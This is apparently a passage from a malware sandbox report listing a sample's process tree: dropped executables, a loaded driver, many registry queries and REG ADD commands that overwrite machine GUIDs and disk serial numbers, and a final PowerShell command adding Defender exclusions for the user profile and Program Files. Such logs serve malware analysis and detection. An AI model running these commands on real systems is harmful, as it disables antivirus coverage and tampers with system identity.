C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe"C:\Users\Admin\AppData\Local\Microsoft\HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Microsoft\RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe"C:\Users\Admin\AppData\Local\Microsoft\RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe" C:\Windows\temp\rJDgWMBlfdUqZqlwLFYFkMkTFYfcDW.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
-
-
C:\Windows\Cursors\lSkEiMlDipseAiVZmeaeMXgcfZjaxg.exe"C:\Windows\Cursors\lSkEiMlDipseAiVZmeaeMXgcfZjaxg.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ptiuvqj.bat""4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d 3cede507-d1d6-40cf-8bf7-3ef9145ef310 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d F80D9FF3AFFEBC6D /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 1414131-ae85b375-A /f5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d B08D_C4E5_DD40_B198_307F_CB74_D8E3_28C5 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\iIejXplCjaCpPshklkztydsmNmHZJd.exe"C:\Users\Admin\AppData\Local\Microsoft\iIejXplCjaCpPshklkztydsmNmHZJd.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
